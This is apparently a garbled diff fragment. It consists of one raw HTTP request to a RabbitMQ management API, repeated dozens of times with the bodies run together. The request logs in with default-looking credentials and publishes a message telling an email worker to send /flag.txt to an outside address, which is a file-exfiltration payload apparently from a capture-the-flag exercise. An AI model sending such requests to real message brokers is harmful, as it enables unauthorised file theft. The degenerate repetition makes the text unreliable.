-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
